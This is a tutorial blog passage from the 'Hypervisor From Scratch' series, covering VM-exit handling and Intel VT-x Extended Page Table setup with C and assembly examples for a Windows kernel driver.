This is because Intel just gives an error number without any further details about what’s exactly wrong in your VMCS Layout.

The errors shown below.

VM Errors

To solve this problem, I created a user-mode application called VmcsAuditor. As its name describes, if you have any error and don’t have any idea about solving the problem then it can be a choice.

Keep in mind that VmcsAuditor is a tool based on Bochs emulator support for VMX so all the checks come from Bochs and it’s not a 100% reliable tool that solves all the problem as we don’t know what exactly happening inside processor but it can be really useful and time saver.

The source code and executable files available on GitHub :


Further description available here.

VM-Exit Handler

When our guest software exits and give the handle back to the host, its VM-exit reasons can be defined in the following definitions.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960#define EXIT_REASON_EXCEPTION_NMI       0#define EXIT_REASON_EXTERNAL_INTERRUPT  1#define EXIT_REASON_TRIPLE_FAULT        2#define EXIT_REASON_INIT                3#define EXIT_REASON_SIPI                4#define EXIT_REASON_IO_SMI              5#define EXIT_REASON_OTHER_SMI           6#define EXIT_REASON_PENDING_VIRT_INTR   7#define EXIT_REASON_PENDING_VIRT_NMI    8#define EXIT_REASON_TASK_SWITCH         9#define EXIT_REASON_CPUID               10#define EXIT_REASON_GETSEC              11#define EXIT_REASON_HLT                 12#define EXIT_REASON_INVD                13#define EXIT_REASON_INVLPG              14#define EXIT_REASON_RDPMC               15#define EXIT_REASON_RDTSC               16#define EXIT_REASON_RSM                 17#define EXIT_REASON_VMCALL              18#define EXIT_REASON_VMCLEAR             19#define EXIT_REASON_VMLAUNCH            20#define EXIT_REASON_VMPTRLD             21#define EXIT_REASON_VMPTRST             22#define EXIT_REASON_VMREAD              23#define EXIT_REASON_VMRESUME            24#define EXIT_REASON_VMWRITE             25#define EXIT_REASON_VMXOFF              26#define EXIT_REASON_VMXON               27#define EXIT_REASON_CR_ACCESS           28#define EXIT_REASON_DR_ACCESS           29#define EXIT_REASON_IO_INSTRUCTION      30#define EXIT_REASON_MSR_READ            31#define EXIT_REASON_MSR_WRITE           32#define EXIT_REASON_INVALID_GUEST_STATE 33#define EXIT_REASON_MSR_LOADING         34#define EXIT_REASON_MWAIT_INSTRUCTION   36#define EXIT_REASON_MONITOR_TRAP_FLAG   37#define EXIT_REASON_MONITOR_INSTRUCTION 39#define EXIT_REASON_PAUSE_INSTRUCTION   40#define EXIT_REASON_MCE_DURING_VMENTRY  41#define EXIT_REASON_TPR_BELOW_THRESHOLD 43#define EXIT_REASON_APIC_ACCESS         44#define EXIT_REASON_ACCESS_GDTR_OR_IDTR 46#define EXIT_REASON_ACCESS_LDTR_OR_TR   47#define EXIT_REASON_EPT_VIOLATION       48#define EXIT_REASON_EPT_MISCONFIG       49#define EXIT_REASON_INVEPT              50#define EXIT_REASON_RDTSCP              51#define EXIT_REASON_VMX_PREEMPTION_TIMER_EXPIRED     52#define EXIT_REASON_INVVPID             53#define EXIT_REASON_WBINVD              54#define EXIT_REASON_XSETBV              55#define EXIT_REASON_APIC_WRITE          56#define EXIT_REASON_RDRAND              57#define EXIT_REASON_INVPCID             58#define EXIT_REASON_RDSEED              61#define EXIT_REASON_PML_FULL            62#define EXIT_REASON_XSAVES              63#define EXIT_REASON_XRSTORS             64#define EXIT_REASON_PCOMMIT             65

VMX Exit handler should be a pure assembly function because calling a compiled function needs some preparing and some register modification and the most important thing in VMX Handler is saving the registers state so that you can continue, other time.

I create a sample function for saving the registers and returning the state but in this function we call another C function.

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061PUBLIC VMExitHandler  EXTERN MainVMExitHandler:PROCEXTERN VM_Resumer:PROC .code _text VMExitHandler PROC     push r15    push r14    push r13    push r12    push r11    push r10    push r9    push r8            push rdi    push rsi    push rbp    push rbp ; rsp    push rbx    push rdx    push rcx    push rax    mov rcx, rsp ;GuestRegs sub rsp, 28h  ;rdtsc call MainVMExitHandler add rsp, 28h    pop rax    pop rcx    pop rdx    pop rbx    pop rbp ; rsp    pop rbp    pop rsi    pop rdi     pop r8    pop r9    pop r10    pop r11    pop r12    pop r13    pop r14    pop r15   sub rsp, 0100h ; to avoid error in future functions JMP VM_Resumer  VMExitHandler ENDP end

The main VM-Exit handler is a switch-case function that has different decisions over the VMCS VM_EXIT_REASON and EXIT_QUALIFICATION.

In this part, we’re just performing an action over EXIT_REASON_HLT and just print the result and restore the previous state.

From the following code, you can clearly see what event cause the VM-exit. Just keep in mind that some reasons only lead to VM-Exit if the VMCS’s control execution fields (described above) allows for it. For instance, the execution of HLT in guest software will cause VM-Exit if the 7th bit of the Primary Processor-Based VM-Execution Controls allows it.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293VOID MainVMExitHandler(PGUEST_REGS GuestRegs){ ULONG ExitReason = 0; __vmx_vmread(VM_EXIT_REASON, &ExitReason);   ULONG ExitQualification = 0; __vmx_vmread(EXIT_QUALIFICATION, &ExitQualification);  DbgPrint(«\nVM_EXIT_REASION 0x%x\n», ExitReason & 0xffff); DbgPrint(«\EXIT_QUALIFICATION 0x%x\n», ExitQualification);   switch (ExitReason) { // // 25.1.2  Instructions That Cause VM Exits Unconditionally // The following instructions cause VM exits when they are executed in VMX non-root operation: CPUID, GETSEC, // INVD, and XSETBV. This is also true of instructions introduced with VMX, which include: INVEPT, INVVPID, // VMCALL, VMCLEAR, VMLAUNCH, VMPTRLD, VMPTRST, VMRESUME, VMXOFF, and VMXON. //  case EXIT_REASON_VMCLEAR: case EXIT_REASON_VMPTRLD: case EXIT_REASON_VMPTRST: case EXIT_REASON_VMREAD: case EXIT_REASON_VMRESUME: case EXIT_REASON_VMWRITE: case EXIT_REASON_VMXOFF: case EXIT_REASON_VMXON: case EXIT_REASON_VMLAUNCH: { break; } case EXIT_REASON_HLT: { DbgPrint(«[*] Execution of HLT detected… \n»);  // DbgBreakPoint();  // that’s enough for now 😉 Restore_To_VMXOFF_State();  break; } case EXIT_REASON_EXCEPTION_NMI: { break; }  case EXIT_REASON_CPUID: { break; }  case EXIT_REASON_INVD: { break; }  case EXIT_REASON_VMCALL: { break; }  case EXIT_REASON_CR_ACCESS: { break; }  case EXIT_REASON_MSR_READ: { break; }  case EXIT_REASON_MSR_WRITE: { break; }  case EXIT_REASON_EPT_VIOLATION: { break; }  default: { // DbgBreakPoint(); break;  } }}

Resume to next instruction

If a VM-Exit occurs (e.g the guest executed a CPUID instruction), the guest RIP remains constant and it’s up to you to change the Guest RIP or not so if you don’t have a special function for managing this situation then you execute a VMRESUME and it’s like an infinite loop of executing CPUID and VMRESUME because you didn’t change the RIP.

In order to solve this problem you have to read a VMCS field called VM_EXIT_INSTRUCTION_LEN that stores the length of the instruction that caused the VM-Exit so you have to first, read the GUEST current RIP, second the VM_EXIT_INSTRUCTION_LEN and third add it to GUEST RIP. Now your GUEST RIP points to the next instruction and you’re good to go.

The following function is for this purpose.

12345678910111213VOID ResumeToNextInstruction(VOID){ PVOID ResumeRIP = NULL; PVOID CurrentRIP = NULL; ULONG ExitInstructionLength = 0;  __vmx_vmread(GUEST_RIP, &CurrentRIP); __vmx_vmread(VM_EXIT_INSTRUCTION_LEN, &ExitInstructionLength);  ResumeRIP = (PCHAR)CurrentRIP + ExitInstructionLength;  __vmx_vmwrite(GUEST_RIP, (ULONG64)ResumeRIP);}


VMRESUME is like VMLAUNCH but it’s used in order to resume the Guest.

  • VMLAUNCH fails if the launch state of current VMCS is not “clear”. If the instruction is successful, it sets the launch state to “launched.”
  • VMRESUME fails if the launch state of the current VMCS is not “launched.”

So it’s clear that if you executed VMLAUNCH before, then you can’t use it anymore to resume to the Guest code and in this condition VMRESUME is used.

The following code is the implementation of VMRESUME.

12345678910111213141516VOID VM_Resumer(VOID){  __vmx_vmresume();  // if VMRESUME succeed will never be here !  ULONG64 ErrorCode = 0; __vmx_vmread(VM_INSTRUCTION_ERROR, &ErrorCode); __vmx_off(); DbgPrint(«[*] VMRESUME Error : 0x%llx\n», ErrorCode);  // It’s such a bad error because we don’t where to go ! // prefer to break DbgBreakPoint();}

Let’s Test it !

Well, we have done with configuration and now its time to run our driver using OSR Driver Loader, as always, first you should disable driver signature enforcement then run your driver.

As you can see from the above picture (in launching VM area), first we set the current logical processor to 0, next we clear our VMCS status using VMCLEAR instruction then we set up our VMCS layout and finally execute a VMLAUNCH instruction.

Now, our guest code is executed and as we configured our VMCS to exit on the execution of HLT(CPU_BASED_HLT_EXITING), so it’s successfully executed and our VM-EXIT handler function called, then it calls the main VM-Exit handler and as the VMCS exit reason is 0xc (EXIT_REASON_HLT), our VM-Exit handler detects an execution of HLT in guest and now it captures the execution.

After that our machine state saving mechanism executed and we successfully turn off hypervisor using VMXOFF and return to the first caller with a successful (RAX = 1) status.

That’s it ! Wasn’t it easy ?!



In this part, we get familiar with configuring Virtual Machine Control Structure and finally run our guest code. The future parts would be an enhancement to this configuration like entering protected-mode,interrupt injectionpage modification logging, virtualizing the current machine and so on thus making sure to visit the blog more frequently for future parts and if you have any question or problem you can use the comments section below.

Thanks for reading!


[1] Vol 3C – Chapter 24 – (VIRTUAL MACHINE CONTROL STRUCTURES) (https://software.intel.com/en-us/articles/intel-sdm)

[2] Vol 3C – Chapter 26 – (VM ENTRIES) (https://software.intel.com/en-us/articles/intel-sdm)

[3] Segmentation (https://wiki.osdev.org/Segmentation)

[4] x86 memory segmentation (https://en.wikipedia.org/wiki/X86_memory_segmentation)

[5] VmcsAuditor – A Bochs-Based Hypervisor Layout Checker (https://rayanfam.com/topics/vmcsauditor-a-bochs-based-hypervisor-layout-checker/)

[6] Rohaaan/Hypervisor For Beginners (https://github.com/rohaaan/hypervisor-for-beginners)

[7] SWAPGS — Swap GS Base Register (https://www.felixcloutier.com/x86/SWAPGS.html)

[8] Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching (http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/)

Hypervisor From Scratch – Part 4: Address Translation Using Extended Page Table (EPT)

Original text by Sinaei )

Welcome to the fourth part of the “Hypervisor From Scratch”. This part is primarily about translating guest address through Extended Page Table (EPT) and its implementation. We also see how shadow tables work and other cool stuff.

First of all, make sure to read the earlier parts before reading this topic as these parts are really dependent on each other also you should have a basic understanding of paging mechanism and how page tables work. A good article is here for paging tables.

Most of this topic derived from  Chapter 28 – (VMX SUPPORT FOR ADDRESS TRANSLATION) available at Intel 64 and IA-32 architectures software developer’s manual combined volumes 3.

The full source code of this tutorial is available on GitHub :


Before starting, I should give my thanks to Petr Beneš, as this part would never be completed without his help.


Second Level Address Translation (SLAT) or nested paging, is an extended layer in the paging mechanism that is used to map hardware-based virtualization virtual addresses into the physical memory.

AMD implemented SLAT through the Rapid Virtualization Indexing (RVI) technology known as Nested Page Tables (NPT) since the introduction of its third-generation Opteron processors and microarchitecture code name BarcelonaIntel also implemented SLAT in Intel® VT-x technologiessince the introduction of microarchitecture code name Nehalem and its known as Extended Page Table (EPT) and is used in  Core i9, Core i7, Core i5, and Core i3 processors.

ARM processors also have some kind of implementation known as known as Stage-2 page-tables.

There are two methods, the first one is Shadow Page Tables and the second one is Extended Page Tables.

Software-assisted paging (Shadow Page Tables)

Shadow page tables are used by the hypervisor to keep track of the state of physical memory in which the guest thinks that it has access to physical memory but in the real world, the hardware prevents it to access hardware memory otherwise it will control the host and it is not what it intended to be.

In this case, VMM maintains shadow page tables that map guest-virtual pages directly to machine pages and any guest modifications to V->P tables synced to VMM V->M shadow page tables.

By the way, using Shadow Page Table is not recommended today as always lead to VMM traps (which result in a vast amount of VM-Exits) and losses the performance due to the TLB flush on every switch and another caveat is that there is a memory overhead due to shadow copying of guest page tables.

Hardware-assisted paging (Extended Page Table)

Nothing Special :)

To reduce the complexity of Shadow Page Tables and avoiding the excessive vm-exits and reducing the number of TLB flushes, EPT, a hardware-assisted paging strategy implemented to increase the performance.

According to a VMware evaluation paper: “EPT provides performance gains of up to 48% for MMU-intensive benchmarks and up to 600% for MMU-intensive microbenchmarks”.

EPT implemented one more page table hierarchy, to map Guest-Virtual Address to Guest-Physical address which is valid in the main memory.


  • One page table is maintained by guest OS, which is used to generate the guest-physical address.
  • The other page table is maintained by VMM, which is used to map guest physical address to host physical address.

so for each memory access operation, EPT MMU directly gets the guest physical address from the guest page table and then gets the host physical address by the VMM mapping table automatically.

Extended Page Table vs Shadow Page Table 


  • Walk any requested address
    • Appropriate to programs that have a large amount of page table miss when executing
    • Less chance to exit VM (less context switch)
  • Two-layer EPT
    • Means each access needs to walk two tables
  • Easier to develop
    • Many particular registers
    • Hardware helps guest OS to notify the VMM


  • Only walk when SPT entry miss
    • Appropriate to programs that would access only some addresses frequently
    • Every access might be intercepted by VMM (many traps)
  • One reference
    • Fast and convenient when page hit
  • Hard to develop
    • Two-layer structure
    • Complicated reverse map
    • Permission emulation

Detecting Support for EPT, NPT

If you want to see whether your system supports EPT on Intel processor or NPT on AMD processor without using assembly (CPUID), you can download coreinfo.exe from Sysinternals, then run it. The last line will show you if your processor supports EPT or NPT.

EPT Translation

EPT defines a layer of address translation that augments the translation of linear addresses.

The extended page-table mechanism (EPT) is a feature that can be used to support the virtualization of physical memory. When EPT is in use, certain addresses that would normally be treated as physical addresses (and used to access memory) are instead treated as guest-physical addresses. Guest-physical addresses are translated by traversing a set of EPT paging structures to produce physical addresses that are used to access memory.

EPT is used when the “enable EPT” VM-execution control is 1. It translates the guest-physical addresses used in VMX non-root operation and those used by VM entry for event injection.

EPT translation is exactly like regular paging translation but with some minor differences. In paging, the processor translates Virtual Address to Physical Address while in EPT translation you want to translate a Guest Virtual Address to Host Physical Address.

If you’re familiar with paging, the 3rd control register (CR3) is the base address of PML4 Table (in an x64 processor or more generally it points to root paging directory), in EPT guest is not aware of EPT Translation so it has CR3 too but this CR3 is used to convert Guest Virtual Address to Guest Physical Address, whenever you find your target Guest Physical Address, it’s EPT mechanism that treats your Guest Physical Address like a virtual address and the EPTP is the CR3

Just think about the above sentence one more time!

So your target physical address should be divided into 4 part, the first 9 bits points to EPT PML4E (note that PML4 base address is in EPTP), the second 9 bits point the EPT PDPT Entry (the base address of PDPT comes from EPT PML4E), the third 9 bits point to EPT PD Entry (the base address of PD comes from EPT PDPTE) and the last 9 bit of the guest physical address point to an entry in EPT PT table (the base address of PT comes form EPT PDE) and now the EPT PT Entry points to the host physical address of the corresponding page.

EPT Translation

You might ask, as a simple Virtual to Physical Address translation involves accessing 4 physical address, so what happens ?! 

The answer is the processor internally translates all tables physical address one by one, that’s why paging and accessing memory in a guest software is slower than regular address translation. The following picture illustrates the operations for a Guest Virtual Address to Host Physical Address.

If you want to think about x86 EPT virtualization,  assume, for example, that CR4.PAE = CR4.PSE = 0. The translation of a 32-bit linear address then operates as follows:

  • Bits 31:22 of the linear address select an entry in the guest page directory located at the guest-physical address in CR3. The guest-physical address of the guest page-directory entry (PDE) is translated through EPT to determine the guest PDE’s physical address.
  • Bits 21:12 of the linear address select an entry in the guest page table located at the guest-physical address in the guest PDE. The guest-physical address of the guest page-table entry (PTE) is translated through EPT to determine the guest PTE’s physical address.
  • Bits 11:0 of the linear address is the offset in the page frame located at the guest-physical address in the guest PTE. The guest physical address determined by this offset is translated through EPT to determine the physical address to which the original linear address translates.

Note that PAE stands for Physical Address Extension which is a memory management feature for the x86 architecture that extends the address space and PSE stands for Page Size Extension that refers to a feature of x86 processors that allows for pages larger than the traditional 4 KiB size.

In addition to translating a guest-physical address to a host physical address, EPT specifies the privileges that software is allowed when accessing the address. Attempts at disallowed accesses are called EPT violations and cause VM-exits.

Keep in mind that address never translates through EPT, when there is no access. That your guest-physical address is never used until there is access (Read or Write) to that location in memory.

Implementing Extended Page Table (EPT)

Now that we know some basics, let’s implement what we’ve learned before. Based on Intel manual we should write (VMWRITE) EPTP or Extended-Page-Table Pointer to the VMCS. The EPTP structure described below.

Extended-Page-Table Pointer

The above tables can be described using the following structure :

123456789101112// See Table 24-8. Format of Extended-Page-Table Pointertypedef union _EPTP { ULONG64 All; struct { UINT64 MemoryType : 3; // bit 2:0 (0 = Uncacheable (UC) — 6 = Write — back(WB)) UINT64 PageWalkLength : 3; // bit 5:3 (This value is 1 less than the EPT page-walk length) UINT64 DirtyAndAceessEnabled : 1; // bit 6  (Setting this control to 1 enables accessed and dirty flags for EPT) UINT64 Reserved1 : 5; // bit 11:7 UINT64 PML4Address : 36; UINT64 Reserved2 : 16; }Fields;}EPTP, *PEPTP;

Each entry in all EPT tables is 64 bit long. EPT PML4E and EPT PDPTE and EPT PD are the same but EPT PTE has some minor differences.

An EPT entry is something like this :

EPT Entries

Ok, Now we should implement tables and the first table is PML4. The following table shows the format of an EPT PML4 Entry (PML4E).


PML4E can be a structure like this :

1234567891011121314151617// See Table 28-1. typedef union _EPT_PML4E { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 Reserved1 : 5; // bit 7:3 (Must be Zero) UINT64 Accessed : 1; // bit 8 UINT64 Ignored1 : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved2 : 4; // bit 51:N UINT64 Ignored3 : 12; // bit 63:52 }Fields;}EPT_PML4E, *PEPT_PML4E;

As long as we want to have a 4-level paging, the second table is EPT Page-Directory-Pointer-Table (PDTP), the following picture illustrates the format of PDPTE :


PDPTE’s structure is like this :

1234567891011121314151617// See Table 28-3typedef union _EPT_PDPTE { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 Reserved1 : 5; // bit 7:3 (Must be Zero) UINT64 Accessed : 1; // bit 8 UINT64 Ignored1 : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved2 : 4; // bit 51:N UINT64 Ignored3 : 12; // bit 63:52 }Fields;}EPT_PDPTE, *PEPT_PDPTE;

For the third table of paging we should implement an EPT Page-Directory Entry (PDE) as described below:


PDE’s structure:

1234567891011121314151617// See Table 28-5typedef union _EPT_PDE { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 Reserved1 : 5; // bit 7:3 (Must be Zero) UINT64 Accessed : 1; // bit 8 UINT64 Ignored1 : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved2 : 4; // bit 51:N UINT64 Ignored3 : 12; // bit 63:52 }Fields;}EPT_PDE, *PEPT_PDE;

The last page is EPT which is described below.


PTE will be :

Note that you have, EPTMemoryType, IgnorePAT, DirtyFlag and SuppressVE in addition to the above pages.

1234567891011121314151617181920// See Table 28-6typedef union _EPT_PTE { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 EPTMemoryType : 3; // bit 5:3 (EPT Memory type) UINT64 IgnorePAT : 1; // bit 6 UINT64 Ignored1 : 1; // bit 7 UINT64 AccessedFlag : 1; // bit 8 UINT64 DirtyFlag : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved : 4; // bit 51:N UINT64 Ignored3 : 11; // bit 62:52 UINT64 SuppressVE : 1; // bit 63 }Fields;}EPT_PTE, *PEPT_PTE;

There are other types of implementing page walks ( 2 or 3 level paging) and if you set the 7th bit of PDPTE (Maps 1 GB) or the 7th bit of PDE (Maps 2 MB) so instead of implementing 4 level paging (like what we want to do for the rest of the topic) you set those bits but keep in mind that the corresponding tables are different. These tables described in (Table 28-4. Format of an EPT Page-Directory Entry (PDE) that Maps a 2-MByte Page) and (Table 28-2. Format of an EPT Page-Directory-Pointer-Table Entry (PDPTE) that Maps a 1-GByte Page). Alex Ionescu’s SimpleVisor is an example of implementing in this way.

An important note is almost all the above structures have a 36-bit Physical Address which means our hypervisor supports only 4-level paging. It is because every page table (and every EPT Page Table) consist of 512 entries which means you need 9 bits to select an entry and as long as we have 4 level tables, we can’t use more than 36 (4 * 9) bits. Another method with wider address range is not implemented in all major OS like Windows or Linux. I’ll describe EPT PML5E briefly later in this topic but we don’t implement it in our hypervisor as it’s not popular yet!

By the way, N is the physical-address width supported by the processor. CPUID with 80000008H in EAX gives you the supported width in EAX bits 7:0.

Let’s see the rest of the code, the following code is the Initialize_EPTP function which is responsible for allocating and mapping EPTP.

Note that the PAGED_CODE() macro ensures that the calling thread is running at an IRQL that is low enough to permit paging.

1234UINT64 Initialize_EPTP(){ PAGED_CODE();        …

First of all, allocating EPTP and put zeros on it.

1234567 // Allocate EPTP PEPTP EPTPointer = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG);  if (!EPTPointer) { return NULL; } RtlZeroMemory(EPTPointer, PAGE_SIZE);

Now, we need a blank page for our EPT PML4 Table.

1234567 // Allocate EPT PML4 PEPT_PML4E EPT_PML4 = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG); if (!EPT_PML4) { ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PML4, PAGE_SIZE);

And another empty page for PDPT.

12345678// Allocate EPT Page-Directory-Pointer-Table PEPT_PDPTE EPT_PDPT = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG); if (!EPT_PDPT) { ExFreePoolWithTag(EPT_PML4, POOLTAG); ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PDPT, PAGE_SIZE);

Of course its true about Page Directory Table.

12345678910 // Allocate EPT Page-Directory PEPT_PDE EPT_PD = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG);  if (!EPT_PD) { ExFreePoolWithTag(EPT_PDPT, POOLTAG); ExFreePoolWithTag(EPT_PML4, POOLTAG); ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PD, PAGE_SIZE);

The last table is a blank page for EPT Page Table.

1234567891011 // Allocate EPT Page-Table PEPT_PTE EPT_PT = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG);  if (!EPT_PT) { ExFreePoolWithTag(EPT_PD, POOLTAG); ExFreePoolWithTag(EPT_PDPT, POOLTAG); ExFreePoolWithTag(EPT_PML4, POOLTAG); ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PT, PAGE_SIZE);

Now that we have all of our pages available, let’s allocate two page (2*4096) continuously because we need one of the pages for our RIP to start and one page for our Stack (RSP). After that, we need two EPT Page Table Entries (PTEs) with permission to executereadwrite. The physical address should be divided by 4096 (PAGE_SIZE) because if we dived a hex number by 4096 (0x1000) 12 digits from the right (which are zeros) will disappear and these 12 digits are for choosing between 4096 bytes.

By the way, we let stack be executable too and that’s because, in a regular VM, we should put RWX to all pages because its the responsibility of internal page tables to set or clear NX bit. We need to change them from EPT Tables for special purposes (e.g intercepting instruction fetch for a special page). Changing from EPT tables will lead to EPT-Violation, in this way we can intercept these events.

The actual need is two page but we need to build page tables inside our guest software thus we allocate up to 10 page.

I’ll explain about intercepting pages from EPT, later in these series.

123456789101112131415161718192021 // Setup PT by allocating two pages Continuously // We allocate two pages because we need 1 page for our RIP to start and 1 page for RSP 1 + 1 and other paages for paging  const int PagesToAllocate = 10; UINT64 Guest_Memory = ExAllocatePoolWithTag(NonPagedPool, PagesToAllocate * PAGE_SIZE, POOLTAG); RtlZeroMemory(Guest_Memory, PagesToAllocate * PAGE_SIZE);  for (size_t i = 0; i < PagesToAllocate; i++) { EPT_PT[i].Fields.AccessedFlag = 0; EPT_PT[i].Fields.DirtyFlag = 0; EPT_PT[i].Fields.EPTMemoryType = 6; EPT_PT[i].Fields.Execute = 1; EPT_PT[i].Fields.ExecuteForUserMode = 0; EPT_PT[i].Fields.IgnorePAT = 0; EPT_PT[i].Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress( Guest_Memory + ( i * PAGE_SIZE ))/ PAGE_SIZE ); EPT_PT[i].Fields.Read = 1; EPT_PT[i].Fields.SuppressVE = 0; EPT_PT[i].Fields.Write = 1;  }

Note: EPTMemoryType can be either 0 (for uncached memory) or 6 (write-back) memory and as we want our memory to be cacheable so put 6 on it.

The next table is PDE. PDE should point to PTE base address so we just put the address of the first entry from the EPT PTE as the physical address for Page Directory Entry.

123456789101112// Setting up PDE EPT_PD->Fields.Accessed = 0; EPT_PD->Fields.Execute = 1; EPT_PD->Fields.ExecuteForUserMode = 0; EPT_PD->Fields.Ignored1 = 0; EPT_PD->Fields.Ignored2 = 0; EPT_PD->Fields.Ignored3 = 0; EPT_PD->Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress(EPT_PT) / PAGE_SIZE); EPT_PD->Fields.Read = 1; EPT_PD->Fields.Reserved1 = 0; EPT_PD->Fields.Reserved2 = 0; EPT_PD->Fields.Write = 1;

Next step is mapping PDPT. PDPT Entry should point to the first entry of Page-Directory.

123456789101112 // Setting up PDPTE EPT_PDPT->Fields.Accessed = 0; EPT_PDPT->Fields.Execute = 1; EPT_PDPT->Fields.ExecuteForUserMode = 0; EPT_PDPT->Fields.Ignored1 = 0; EPT_PDPT->Fields.Ignored2 = 0; EPT_PDPT->Fields.Ignored3 = 0; EPT_PDPT->Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress(EPT_PD) / PAGE_SIZE); EPT_PDPT->Fields.Read = 1; EPT_PDPT->Fields.Reserved1 = 0; EPT_PDPT->Fields.Reserved2 = 0; EPT_PDPT->Fields.Write = 1;

The last step is configuring PML4E which points to the first entry of the PTPT.

123456789101112 // Setting up PML4E EPT_PML4->Fields.Accessed = 0; EPT_PML4->Fields.Execute = 1; EPT_PML4->Fields.ExecuteForUserMode = 0; EPT_PML4->Fields.Ignored1 = 0; EPT_PML4->Fields.Ignored2 = 0; EPT_PML4->Fields.Ignored3 = 0; EPT_PML4->Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress(EPT_PDPT) / PAGE_SIZE); EPT_PML4->Fields.Read = 1; EPT_PML4->Fields.Reserved1 = 0; EPT_PML4->Fields.Reserved2 = 0; EPT_PML4->Fields.Write = 1;

We’ve almost done! Just set up the EPTP for our VMCS by putting 0x6 as the memory type (which is write-back) and we walk 4 times so the page walk length is 4-1=3 and PML4 address is the physical address of the first entry in the PML4 table.

I’ll explain about DirtyAndAcessEnabled field later in this topic.

1234567 // Setting up EPTP EPTPointer->Fields.DirtyAndAceessEnabled = 1; EPTPointer->Fields.MemoryType = 6; // 6 = Write-back (WB) EPTPointer->Fields.PageWalkLength = 3;  // 4 (tables walked) — 1 = 3 EPTPointer->Fields.PML4Address = (VirtualAddress_to_PhysicalAddress(EPT_PML4) / PAGE_SIZE); EPTPointer->Fields.Reserved1 = 0; EPTPointer->Fields.Reserved2 = 0;

and the last step.

12 DbgPrint(«[*] Extended Page Table Pointer allocated at %llx»,EPTPointer); return EPTPointer;

All the above page tables should be aligned to 4KByte boundaries but as long as we allocate >= PAGE_SIZE (One PFN record) so it’s automatically 4kb-aligned.

Our implementation consist of 4 tables, therefore, the full layout is like this:

EPT Layout

Accessed and Dirty Flags in EPTP

In EPTP, you’ll decide whether enable accessed and dirty flags for EPT or not using the 6th bit of the extended-page-table pointer (EPTP). Setting this flag causes processor accesses to guest paging structure entries to be treated as writes.

For any EPT paging-structure entry that is used during guest-physical-address translation, bit 8 is the accessed flag. For an EPT paging-structure entry that maps a page (as opposed to referencing another EPT paging structure), bit 9 is the dirty flag.

Whenever the processor uses an EPT paging-structure entry as part of the guest-physical-address translation, it sets the accessed flag in that entry (if it is not already set).

Whenever there is a write to a guest-physical address, the processor sets the dirty flag (if it is not already set) in the EPT paging-structure entry that identifies the final physical address for the guest-physical address (either an EPT PTE or an EPT paging-structure entry in which bit 7 is 1).

These flags are “sticky,” meaning that, once set, the processor does not clear them; only software can clear them.

5-Level EPT Translation

Intel suggests a new table in translation hierarchy, called PML5 which extends the EPT into a 5-layer table and guest operating systems can use up to 57 bit for the virtual-addresses while the classic 4-level EPT is limited to translating 48-bit guest-physical
addresses. None of the modern OSs use this feature yet.

PML5 is also applying to both EPT and regular paging mechanism.

Translation begins by identifying a 4-KByte naturally aligned EPT PML5 table. It is located at the physical address specified in bits 51:12 of EPTP. An EPT PML5 table comprises 512 64-bit entries (EPT PML5Es). An EPT PML5E is selected using the physical address defined as follows.

  • Bits 63:52 are all 0.
  • Bits 51:12 are from EPTP.
  • Bits 11:3 are bits 56:48 of the guest-physical address.
  • Bits 2:0 are all 0.
  • Because an EPT PML5E is identified using bits 56:48 of the guest-physical address, it controls access to a 256-TByte region of the linear address space.

The only difference is you should put PML5 physical address instead of the PML4 address in EPTP.

For more information about 5-layer paging take a look at this Intel documentation.

Invalidating Cache (INVEPT)

Well, Intel’s explanation about Cache invalidating is really vague and I couldn’t understand it completely but I asked Petr and he explains me in this way:

  • VMX-specific TLB-management instructions:
    • INVEPT – Invalidate cached Extended Page Table (EPT) mappings in the processor to synchronize address translation in virtual machines with memory-resident EPT pages.
    • INVVPID – Invalidate cached mappings of address translation based on the Virtual Processor ID (VPID).

